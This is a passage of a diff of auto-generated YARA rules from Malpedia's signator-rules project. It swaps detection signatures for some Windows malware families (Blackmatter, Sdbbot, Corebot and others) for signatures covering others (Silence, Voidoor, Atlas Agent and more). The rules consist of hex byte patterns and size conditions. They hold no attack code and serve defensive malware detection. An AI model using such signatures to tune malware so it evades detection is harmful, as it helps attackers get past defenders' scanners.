"autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d22cba4e-b95b-5578-ac95-09534bd7dc14" - date = "2022-11-21" - modified = "2022-11-25" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_063" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_063_auto.yar#L1-L124" + id = "2cc3d8fa-aa39-5bef-af3b-a091606785c2" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.marap_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "14c180eecdf0e6fbf2b936d6c444ad58c2e649e1fa770106e8719057ee1aefbd" + logic_hash = "981ff96ccf9321bc9cf0b93466d635ede7fbc6c0341e04e670ea58028783ac37" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20221118" - malpedia_hash = "e0702e2e6d1d00da65c8a29a4ebacd0a4c59e1af" - malpedia_version = "20221125" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d43cf 83f819 770c 6689b550030000 e9???????? } - $sequence_1 = { 7363 488bf3 4c8d35dfc40100 83e63f 488beb 48c1fd06 48c1e606 } - $sequence_2 = { e8???????? 4863f8 488d3588800100 488bcb } - $sequence_3 = { 0f11442478 4c8b4708 488d442470 493bc0 7362 488b07 488d4c2470 } - $sequence_4 = { 4885c9 7407 48ff25???????? c3 48894c2408 57 4883ec50 } - $sequence_5 = { 83f801 7518 488b0d???????? 488d05bf5f0100 483bc8 7405 e8???????? } - $sequence_6 = { 8b8c96d0cd0200 8b534c 33c8 0fb6c1 } - $sequence_7 = { 0f84e7000000 488b0e 483bc8 740e 4885c9 7406 } - $sequence_8 = { 498bc2 418be9 48c1f806 488d0d708c0100 4183e23f 4903e8 } - $sequence_9 = { 488d158a5a0200 488bcb e8???????? 85c0 7499 488d157f5a0200 488bcb } + $sequence_0 = { e9???????? 8386e41d000002 e9???????? 8386e41d000003 } + $sequence_1 = { 7409 8386e41d000008 eb2f 84c0 7908 018ee41d0000 } + $sequence_2 = { ff15???????? 8bf0 89b59cfbffff 83feff 7472 } + $sequence_3 = { ff15???????? 85c0 7425 8b480c 8b11 8b02 } + $sequence_4 = { 81fb00040000 737e 8bc7 8bd7 668b08 } + $sequence_5 = { 0fbe84c1f8cb0010 6a07 c1f804 59 } + $sequence_6 = { 83c40c 8d7bfe 668b4702 83c702 6685c0 75f4 } + $sequence_7 = { 8d1c8580320110 8b03 83e71f c1e706 8a4c3824 } + $sequence_8 = { 8d4310 8d8954f40010 5a 668b31 } + $sequence_9 = { 80f901 0f8487000000 6683fa06 7519 84c0 } condition: - 7 of them and filesize <475136 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Saigon_Auto : FILE +rule MALPEDIA_Win_Advisorsbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a473943a-8ea5-58ac-80e3-98de6dfb8169" + id = "4423ed68-193a-5b69-9a0c-e4a68868d775" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.saigon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.saigon_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.advisorsbot_auto.yar#L1-L169" license_url = "N/A" - logic_hash = "a5d9048555d265aef66c2410783198e6f4dd9139107e5b71b76341530d3b556c" + logic_hash = "63e408f2b85153604b6cbce7b119689dceb4fed854cd697bc92427d51dad5ae1" score = 75 quality = 75 tags = "FILE" @@ -138898,32 +141773,41 @@ rule MALPEDIA_Win_Saigon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7508 ff15???????? 8bd8 4c8d5c2450 8bc3 498b5b20 498b6b28 } - $sequence_1 = { 4889442440 488364243800 488364243000 4533c0 488bd3 33c9 } - $sequence_2 = { ff15???????? 33ed 488bcb 85c0 } - $sequence_3 = { 7459 f60301 742c 418bcf 488bd0 4903cc e8???????? } - $sequence_4 = { 488b0d???????? 4c8bc7 33d2 8bd8 ff15???????? eb1e } - $sequence_5 = { 4156 4157 4883ec60 4c8bea 488d50c8 4d8bf9 e8???????? } - $sequence_6 = { ffd0 85c0 790e 8bc8 } - $sequence_7 = { 4c8d8584020000 488d8c2460060000 448bcb 418bd6 e8???????? } - $sequence_8 = { 33d2 8d440036 448bc0 448be0 ff15???????? } - $sequence_9 = { 8d4f01 448bcf 4c8bc6 894c2428 33c9 33d2 } + $sequence_0 = { 8bc1 2bc2 d1e8 03c2 c1e808 } + $sequence_1 = { 8bc2 33d2 c1e809 f7f1 } + $sequence_2 = { 8bc2 33d2 c1e808 f7f1 } + $sequence_3 = { b89b01a311 f7e1 2bca d1e9 03ca } + $sequence_4 = { d1e8 03c2 33d2 c1e809 } + $sequence_5 = { 8bc2 c1e809 33d2 f7f1 } + $sequence_6 = { 8b442408 8b4c2408 33d2 f7f1 } + $sequence_7 = { d1e9 03ca 33d2 c1e909 } + $sequence_8 = { d1e9 03ca c1e907 2bc1 } + $sequence_9 = { b839811338 f7e1 8bc1 2bc2 } + $sequence_10 = { d1e9 03ca c1e909 33c8 } + $sequence_11 = { 8bc2 33d2 c1e804 f7f1 } + $sequence_12 = { 8bca f7e2 8bc1 2bc2 } + $sequence_13 = { 668b4c2410 5f 5e 5d } + $sequence_14 = { 0fb7c1 0fb7ca 33d2 f7f1 } + $sequence_15 = { 0fb7c0 0fb7c9 33d2 f7f1 } + $sequence_16 = { 0fb6c0 0fb6c9 33d2 f7f1 } + $sequence_17 = { 8b442414 8b4c2414 33d2 f7f1 } + $sequence_18 = { 5e 5d 0fb7c2 5b } condition: - 7 of them and filesize <147456 + 7 of them and filesize <434176 } -rule MALPEDIA_Win_Blackcoffee_Auto : FILE +rule MALPEDIA_Win_W32Times_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "73dd8c3a-f7dc-5a69-bc96-7ac383f83a0a" + id = "0bfdc72d-d05e-5c1b-8705-7d1b1a1a85f1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackcoffee_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.w32times_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "5b61b5b3834a5515967b9008b852cdcc413fc16af2ff85fb0eab8d0101f0945d" + logic_hash = "09784a57b734a06db72c3b3952721b8e38cad13da9a478a5c4cffbebd654009b" score = 75 quality = 75 tags = "FILE" @@ -138937,32 +141821,32 @@ rule MALPEDIA_Win_Blackcoffee_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d85b4feffff 50 ff75f8 ff15???????? 8b85b4feffff } - $sequence_1 = { 8b35???????? 57 33ff 3bc7 7416 57 50 } - $sequence_2 = { 8b45fc 83c424 8d44301a 6a1c 6a40 894508 ff15???????? } - $sequence_3 = { 890d???????? ebdb 89848a00c0e7ff a1???????? ff05???????? } - $sequence_4 = { e8???????? ff36 e8???????? 83c00c 68444e4549 } - $sequence_5 = { 8d856cffffff c7856cffffff94000000 50 ff15???????? 6a05 } - $sequence_6 = { c20800 55 8bec 81ec98000000 56 57 } - $sequence_7 = { 899d30ffffff 66895df0 f3ab 8d7df2 6a0f } - $sequence_8 = { 83c00c 0107 8b37 03f3 e8???????? 6854414449 } - $sequence_9 = { 57 c7460404100680 897e0c 894614 ff75f8 53 ff15???????? } + $sequence_0 = { e8???????? 85c0 0f8487030000 6a01 68???????? } + $sequence_1 = { 83e103 f3a4 8b35???????? 8d8c24f0020000 68???????? 51 ffd6 } + $sequence_2 = { 83c408 68???????? ff15???????? 85c0 0f85c6060000 ff15???????? } + $sequence_3 = { ff15???????? 68???????? ff15???????? 396c2418 7410 6a01 } + $sequence_4 = { 3b9c24000d0000 0f84cc090000 8a8424f0020000 84c0 0f84bd090000 8a8424e8000000 84c0 } + $sequence_5 = { 8bfd 83c9ff 33c0 8d9424ec010000 f2ae f7d1 2bf9 } + $sequence_6 = { 8b15???????? 52 ffd3 892d???????? a1???????? 3bc5 7416 } + $sequence_7 = { f3a5 8bcd 8d9424f4030000 83e103 f3a4 8dbc24f4040000 } + $sequence_8 = { 683f000f00 6a00 56 ff15???????? 8bf8 } + $sequence_9 = { 83c40c 85c0 0f85e00c0000 8b4b04 6a04 } condition: - 7 of them and filesize <118784 + 7 of them and filesize <122880 } -rule MALPEDIA_Win_Blackmatter_Auto : FILE +rule MALPEDIA_Win_Bee_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "08d983f8-89d3-5398-96f5-8f771b0988c8" + id = "cf854a1b-a3fa-5497-9620-9eb04ca1acba" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackmatter_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bee" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bee_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "67609ff5035d7d172ddf1a903ab845a6e5b4b36e758aab3cb262223fbb37577d" + logic_hash = "d1087a1b19c31419362e6bad586912e9950c25554053241c2a8ca3db38a0bc54" score = 75 quality = 75 tags = "FILE" @@ -138976,34 +141860,34 @@ rule MALPEDIA_Win_Blackmatter_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 57 c745fc00000000 ff35???????? e8???????? 8bf8 } - $sequence_1 = { ff75f8 ff15???????? 85c0 0f85e7000000 68???????? } - $sequence_2 = { 83c4d8 53 56 57 c745fc00000000 c745f800000000 } - $sequence_3 = { e8???????? 8945fc eb0c 83c702 ff4df8 837df800 } - $sequence_4 = { e9???????? ff75c8 e8???????? 8945c4 } - $sequence_5 = { ff15???????? 83c40c 8d047500000000 50 8d45da } - $sequence_6 = { 85f6 0f842c010000 56 ff35???????? e8???????? ff35???????? e8???????? } - $sequence_7 = { f7f1 92 3b4508 720b 3b450c } - $sequence_8 = { 8945ec e8???????? e8???????? 803d????????00 7405 } - $sequence_9 = { ff75f4 e8???????? 5e 5b 8be5 5d c3 } + $sequence_0 = { 0f8326010000 8bce d1e9 ba49922409 2bd1 3bd6 7304 } + $sequence_1 = { 83c404 89742418 c644244806 3bf3 741d 8b542414 } + $sequence_2 = { 668944241c 52 8d44241c 50 8d4c2438 c744242000000000 e8???????? } + $sequence_3 = { e8???????? 8b542424 56 6a00 52 e8???????? 8b7c2434 } + $sequence_4 = { 8d8424a4000000 8a10 3a11 751a 3ad3 7412 } + $sequence_5 = { 8bf9 80bfd800000000 754e 6a11 6a02 6a02 } + $sequence_6 = { e8???????? 8d0cb6 c1e104 03c8 89470c 894710 } + $sequence_7 = { 8bc3 8bcf e8???????? 2bf7 b867666666 f7ee } + $sequence_8 = { e8???????? 83c414 8b45fc ff34c5e4314200 } + $sequence_9 = { 64a300000000 8b6c2420 33db 895d04 885d0c } condition: - 7 of them and filesize <194560 + 7 of them and filesize <394240 } -rule MALPEDIA_Win_Sdbbot_Auto : FILE +rule MALPEDIA_Win_Silence_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6668321a-45c2-56a4-8219-52041c66e0ea" + id = "f44b3bc4-8edd-502b-bd51-3105b7335797" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sdbbot_auto.yar#L1-L188" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.silence_auto.yar#L1-L413" license_url = "N/A" - logic_hash = "0618d5957379edb357e3ce8de647ff0724885b87e782036bd514add2c7f2cbe6" + logic_hash = "c771c849ed5f5e02e308e7f1e45bb9b0766da378108a761728400240a10fde1e" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -139015,42 +141899,71 @@ rule MALPEDIA_Win_Sdbbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8bf8 ba4d5a0000 6690 } - $sequence_1 = { 803e61 7203 83c1e0 81c2ffff0000 03cf } - $sequence_2 = { 8bcf 85d2 7418 8bfe 2b7df8 } - $sequence_3 = { 8d4901 8841ff 8d5201 83ee01 } - $sequence_4 = { 2bd1 03c1 8955ec 8945e4 85d2 0f8560ffffff } - $sequence_5 = { 8b7028 33c9 0fb75024 0f1f8000000000 0fb63e } - $sequence_6 = { 8b01 03c6 8945e8 eb2e 3daafc0d7c } - $sequence_7 = { 6683f803 750b 81e1ff0f0000 013c31 eb27 6683f801 7511 } - $sequence_8 = { c3 803d????????00 750c c605????????01 } - $sequence_9 = { 33f6 8a27 83c702 84e4 7437 } - $sequence_10 = { 7419 0f1f8000000000 0fb602 48ffc2 8801 488d4901 4983e801 } - $sequence_11 = { 0f1f840000000000 418b49f8 49ffca 418b11 4903ce 458b41fc } - $sequence_12 = { 7204 4883c0e0 4803c1 48ffc2 664503c1 75e5 3d5bbc4a6a } - $sequence_13 = { 48833f00 488bd8 75a4 4883c514 837d0000 0f856dffffff } - $sequence_14 = { 4903ce 41ffd5 488bf0 4885c0 7474 } - $sequence_15 = { 85c0 0f84bb000000 418b9fb0000000 8bf8 4903de } - $sequence_16 = { 4d2bc5 0fb601 41880408 488d4901 4883ea01 75ef 450fb74f14 } - $sequence_17 = { 4d03fd 41b800300000 448d4940 418b5750 ffd6 418b5750 488bc8 } + $sequence_0 = { 8d45fc 50 6a00 6a00 68???????? c745fc00000000 } + $sequence_1 = { 740a 8a4801 40 84c9 75f4 eb05 803800 } + $sequence_2 = { 8b4908 e8???????? cc 8325????????00 c3 6a08 } + $sequence_3 = { 683f020f00 6a00 68???????? 6801000080 ff15???????? 68???????? } + $sequence_4 = { 3b0d???????? 7502 f3c3 e9???????? e8???????? e9???????? 6a14 } + $sequence_5 = { 68???????? ffd6 8b45fc 85c0 } + $sequence_6 = { ff15???????? 6a00 6800000004 6a00 } + $sequence_7 = { 46 56 8d85f8feffff 50 } + $sequence_8 = { 6801000080 ff15???????? 56 8d85f8feffff } + $sequence_9 = { 8bd8 68???????? 53 ff15???????? 6a00 } + $sequence_10 = { 8b35???????? 6a00 6a00 6a00 6a00 8d45fc 50 } + $sequence_11 = { 6a00 8bf8 6a00 57 ff15???????? 8d45fc 50 } + $sequence_12 = { 40 84c9 75f4 eb0d 803800 7408 } + $sequence_13 = { 803800 7408 8a5a01 42 84db } + $sequence_14 = { 5e 5b 5d c3 c60200 42 } + $sequence_15 = { 8d85b8f7ffff 50 6800080000 8d85bcf7ffff } + $sequence_16 = { 8b85b8f7ffff 85c0 75b6 ffb5acf7ffff } + $sequence_17 = { 83c41c 895ef8 897ef0 5b 5f } + $sequence_18 = { 8bf9 e8???????? ff37 8b35???????? } + $sequence_19 = { ff501c 8b17 8bcf ff5210 8b17 } + $sequence_20 = { 7412 8b01 52 8d95f0fdffff 52 ff10 } + $sequence_21 = { 8d8dfcfbffff 51 ffb5f0fbffff 8bcb ff5038 } + $sequence_22 = { 0346f4 57 ff7508 50 e8???????? 83c40c } + $sequence_23 = { 03d7 3b56f0 7611 8b46ec } + $sequence_24 = { 85c9 7408 8b06 51 8bce ff501c } + $sequence_25 = { d3e0 0fb6c8 8b05???????? d3e0 } + $sequence_26 = { ff15???????? ba180c0000 b940000000 ff15???????? } + $sequence_27 = { ff15???????? 488d542430 488d8c2440020000 ff15???????? } + $sequence_28 = { 8b05???????? d3e0 8b0d???????? 03c8 } + $sequence_29 = { e8???????? ba00040000 b940000000 ff15???????? } + $sequence_30 = { ff15???????? 41b804010000 488d542430 488d4c2430 ff15???????? 85c0 } + $sequence_31 = { d3f8 0fb60d???????? d3e0 85c0 } + $sequence_32 = { 99 83e203 03c2 c1f802 89442440 } + $sequence_33 = { ff15???????? c20800 53 8b1d???????? 57 0f57c0 } + $sequence_34 = { 5e 85c0 7507 68???????? ffd7 5f } + $sequence_35 = { 7507 68???????? ffd7 6a00 6a00 6a01 6a00 } + $sequence_36 = { 750e 68???????? ff15???????? c20800 } + $sequence_37 = { 8d0441 33d2 b905000000 f7f1 } + $sequence_38 = { c705????????00000000 c705????????00000000 ffd3 8b3d???????? 85c0 7507 } + $sequence_39 = { 68???????? ff15???????? a3???????? 85c0 750e 68???????? } + $sequence_40 = { 8bec ff4d08 755d 833d????????04 7554 } + $sequence_41 = { c705????????04000000 ff15???????? 85c0 750b 68???????? ff15???????? } + $sequence_42 = { ff15???????? 68c0d40100 ff15???????? e9???????? } + $sequence_43 = { 03048db0354200 50 ff15???????? 5d } + $sequence_44 = { 0305???????? 0b45f0 3305???????? a3???????? } + $sequence_45 = { 03048db0354200 eb02 8bc6 80782900 } + $sequence_46 = { 03048db0354200 eb05 b8???????? f6402820 } condition: - 7 of them and filesize <1015808 + 7 of them and filesize <70128640 } -rule MALPEDIA_Win_Flawedammyy_Auto : FILE +rule MALPEDIA_Win_Voidoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3bd73c1c-99e8-572f-ab1b-fa9278709331" + id = "71f97a7b-09b8-5977-a64d-26462fe6285b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flawedammyy_auto.yar#L1-L298" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.voidoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.voidoor_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "4dc76e66643bc2a94f8c1ec04c44669739ca4e00a00102a02a05781e927a5ab3" + logic_hash = "c8a62c7797e4a86d80b8a858487a45d1e5042e60b70ed193ca612e4172a00dd8" score = 75 - quality = 33 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -139062,54 +141975,32 @@ rule MALPEDIA_Win_Flawedammyy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0000 0404 0404 0404 0401 } - $sequence_1 = { 8bc4 83ec10 660fd600 f30f7e45ac } - $sequence_2 = { 00b3854200e5 854200 37 864200 } - $sequence_3 = { 8d85bcfcffff 68???????? 50 ffd3 68dff0f081 6a01 e8???????? } - $sequence_4 = { ffd6 8d8594f3ffff 50 68???????? 68???????? } - $sequence_5 = { 004bbf 42 0062bf 42 } - $sequence_6 = { 0039 e342 0048e3 42 } - $sequence_7 = { ff05???????? f7460c0c010000 7554 833cbd7cae410000 53 } - $sequence_8 = { 8d85bcfdffff 50 ffd3 8b45fc 80384d 0f85a7000000 8078015a } - $sequence_9 = { e8???????? 53 8d85c0fdffff 50 56 e8???????? } - $sequence_10 = { 0018 874200 58 874200 } - $sequence_11 = { 8b35???????? 8d85a0f6ffff 50 8d85a8f8ffff } - $sequence_12 = { 002a e342 0039 e342 } - $sequence_13 = { 8bf0 ff5208 85f6 0f8818feffff ff7508 8d4df0 e8???????? } - $sequence_14 = { 0022 8a4200 828a4200bb8a42 00ff } - $sequence_15 = { 0062bf 42 0079bf 42 } - $sequence_16 = { ff15???????? 8b75d8 e9???????? 8d85d0feffff 68???????? 50 ff15???????? } - $sequence_17 = { 8b46f8 834de4ff 49 c745e8ff000000 8b3c857c303400 c745ecffff0000 0faff9 } - $sequence_18 = { 4e 48 75f7 68???????? 57 ff15???????? } - $sequence_19 = { 8bdf 8b06 83661c00 83f807 0f87c9000000 ff248580233400 } - $sequence_20 = { 8b46f8 8b04855c303400 c1e002 50 6a40 } - $sequence_21 = { 8b4ef8 83f907 0f8781000000 ff248dfd243400 } - $sequence_22 = { 7330 ff75f8 ff15???????? 81c600040000 6a42 56 } - $sequence_23 = { eb0e 8b14957c303400 49 0fafd1 0155fc } - $sequence_24 = { 83f937 7f2a 8d44c1d0 0fbe0a } - $sequence_25 = { 33db 83f855 0f872affffff 0fb6805a213400 ff2485f6203400 8b8614080000 } - $sequence_26 = { 56 8a0a 80f930 7569 } - $sequence_27 = { 395d08 88987830ca01 0f8484010000 ff75fc 8b35???????? ffd6 f6450802 } - $sequence_28 = { 50 e8???????? ff75ac 8b3d???????? ffd7 ff75a8 ffd7 } - $sequence_29 = { ff248580233400 832700 e9???????? 55 e8???????? eb1a } - $sequence_30 = { 895df0 ffd6 53 ff75dc 6813100000 ff35???????? } - $sequence_31 = { 0f8781000000 ff248dfd243400 881f eb76 } + $sequence_0 = { e8???????? 83c410 83bfb40b000000 752e ff33 83bf500b000000 ffb608400000 } + $sequence_1 = { c645fc10 e8???????? c78574feffff0f000000 c78570feffff00000000 c68560feffff00 8d9560feffff 8d8d78feffff } + $sequence_2 = { 03f5 7458 803e2f 7509 83f804 7d04 40 } + $sequence_3 = { 55 8bd8 ff15???????? 83c414 85db 0f85c3010000 8b542440 } + $sequence_4 = { 8b742414 c744240800000000 83bec802000000 8b1e 57 8b834c010000 8dbe68050000 } + $sequence_5 = { c60201 8b10 2bca 83f906 7d0a b801000000 5e } + $sequence_6 = { 33c0 5f 59 c3 56 57 e8???????? } + $sequence_7 = { b91b000000 5e 0f44d9 5d 8bc3 5b 83c408 } + $sequence_8 = { e8???????? 83c40c 89442418 8983ac030000 68???????? 53 e8???????? } + $sequence_9 = { c6434501 3944241c 7520 85f6 0f8565ffffff 837c243020 7337 } condition: - 7 of them and filesize <1350656 + 7 of them and filesize <1744896 } -rule MALPEDIA_Win_Corebot_Auto : FILE +rule MALPEDIA_Win_Sfile_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "690f2e96-0cf9-536c-962e-128a98cf1d0b" + id = "2a05bff3-25b7-5fd3-9a80-0b0955cab792" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.corebot_auto.yar#L1-L167" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sfile" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sfile_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "f317e1a133d092285e381a2c4a6a16830d0d7cb17eced179ceadea1ad59e039d" + logic_hash = "b6be99a284bb08bd87d7e6d12a69d9966762868a0d094add32f60ffa636331bd" score = 75 quality = 75 tags = "FILE" @@ -139123,38 +142014,32 @@ rule MALPEDIA_Win_Corebot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 31c0 5e 5d c20800 55 89e5 } - $sequence_1 = { 01f3 8b75ec 56 8945f0 } - $sequence_2 = { 0fb618 895de8 c745ec07000000 8d141b 84db 8955e8 } - $sequence_3 = { 50 e8???????? 83c404 29f7 } - $sequence_4 = { 51 ff15???????? 85c0 0f95c0 eb08 c70600000000 } - $sequence_5 = { 31f6 8955e8 894dec 43 8b4dec 8d55f0 } - $sequence_6 = { 31f6 46 8918 89f0 83c40c 5e 5f } - $sequence_7 = { 43 8b4dec 8d55f0 e8???????? 85db 7827 } - $sequence_8 = { e8???????? 807e5800 7509 ff7654 ff15???????? 807e5000 7509 } - $sequence_9 = { eb10 6800800000 6a00 56 } - $sequence_10 = { 85c0 7515 8b4624 3b4620 } - $sequence_11 = { ff7010 ff7014 e8???????? 8b45e0 } - $sequence_12 = { ff15???????? 8d4634 50 ff15???????? 8d4e0c e8???????? } - $sequence_13 = { ff15???????? 807e5000 7509 ff764c ff15???????? 8d4634 50 } - $sequence_14 = { ff742428 e8???????? 8b442424 8d4c2410 } - $sequence_15 = { 85ff 740f 57 ff7508 } + $sequence_0 = { 50 e8???????? 8b4d08 8b5144 } + $sequence_1 = { 8b55fc 83c201 8955fc 837dfc08 7d12 } + $sequence_2 = { e8???????? 83c41c eb2b 837d0803 7525 } + $sequence_3 = { 8bec 83ec20 8b4508 8b888c050000 } + $sequence_4 = { eb13 8b55f8 8b4210 8d0c8510000000 } + $sequence_5 = { 51 ff15???????? 8b55f0 52 ff15???????? 8b45ec 50 } + $sequence_6 = { c745fc08000000 eb09 8b85b8fdffff 8945fc 8b4dfc 83c106 } + $sequence_7 = { 8d4c0002 8b55e8 894a04 8b45f8 } + $sequence_8 = { 68fc000000 8b4df0 8b11 52 } + $sequence_9 = { c60100 837dec00 7547 6af5 ff15???????? 8945f0 } condition: - 7 of them and filesize <1302528 + 7 of them and filesize <588800 } -rule MALPEDIA_Win_Mylobot_Auto : FILE +rule MALPEDIA_Win_Atlas_Agent_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7a067cd7-af50-5d95-bc8a-c729265f1a45" + id = "31d9d19b-f3ba-501d-964d-67da428e9e82" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mylobot_auto.yar#L1-L164" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atlas_agent" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.atlas_agent_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "e9a5b8dbe1c5cc719187453536536d6ca11df9a61a8a5853882ca3075e6106f0" + logic_hash = "49564f12d410922863a80d6084c9c71952a7f941729a00c4d7e4e12f95d889bc" score = 75 quality = 75 tags = "FILE" @@ -139168,38 +142053,36 @@ rule MALPEDIA_Win_Mylobot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff5014 56 6a00 50 8947f8 } - $sequence_1 = { 89442414 75c7 eb02 33f6 85f6 741c } - $sequence_2 = { 0f8344030000 8b0c83 8b442428 3bc8 0f823e020000 03442418 } - $sequence_3 = { 83c41c 2b4734 7409 50 53 e8???????? } - $sequence_4 = { 898108010000 8d442414 50 68???????? } - $sequence_5 = { 51 ff742410 50 8d84248c020000 50 } - $sequence_6 = { a1???????? 53 ff507c 8bf8 85ff 0f8491000000 8d442410 } - $sequence_7 = { 81eccc000000 8b450c 53 56 57 8b00 } - $sequence_8 = { 75cc 80bdfcfdffff01 0f8581000000 68???????? ff15???????? } - $sequence_9 = { c785d4fdffff28010000 ff15???????? 8d8dd4fdffff 8bf8 } - $sequence_10 = { 2bc2 8bc8 8bc3 8d7801 } - $sequence_11 = { 83bd48ffffff00 0f85e9000000 807dda01 0f95c0 } - $sequence_12 = { 7857 8b07 85c0 7462 } - $sequence_13 = { ffd3 68???????? 8d742414 e8???????? 83c404 85c0 } - $sequence_14 = { 897df4 3bc7 743d 8d55f4 } - $sequence_15 = { 8bf0 81fed0040000 750e 8b4718 50 57 } + $sequence_0 = { 0fb60c0a 83e13c c1f902 03c1 } + $sequence_1 = { 8bc1 99 b903000000 f7f9 c1e002 } + $sequence_2 = { 4c8b8424c8000000 488b9424c0000000 488b8c2480000000 e8???????? 89442460 } + $sequence_3 = { 4c8b8424e0000000 488b9424d8000000 488b4c2468 e8???????? } + $sequence_4 = { 89857cffffff c645fc06 83bd7cffffff00 7417 } + $sequence_5 = { 898584feffff 8b8584feffff 50 8d8dd4feffff } + $sequence_6 = { 898588f8ffff 8b9588f8ffff 899584f8ffff c645fc07 } + $sequence_7 = { 4c8b8424f0000000 488b942488000000 488b8c24e0000000 e8???????? } + $sequence_8 = { 89857cffffff 83bd7cffffff1e 7302 eb05 } + $sequence_9 = { 4c8b8424f8000000 488b942400010000 488d8c24f0030000 e8???????? } + $sequence_10 = { 89857cffffff 8b8d18ffffff 894d80 83bd7cffffff00 } + $sequence_11 = { 4c8b8c2408010000 4c8d05c2930400 ba40000000 488d4c2470 } + $sequence_12 = { 89857cffffff 895580 8b4580 3b45dc } + $sequence_13 = { 4c8b8c2408010000 4c8d442460 488b9424f8000000 488b8c24f0000000 } condition: - 7 of them and filesize <8028160 + 7 of them and filesize <857088 } -rule MALPEDIA_Win_Cradlecore_Auto : FILE +rule 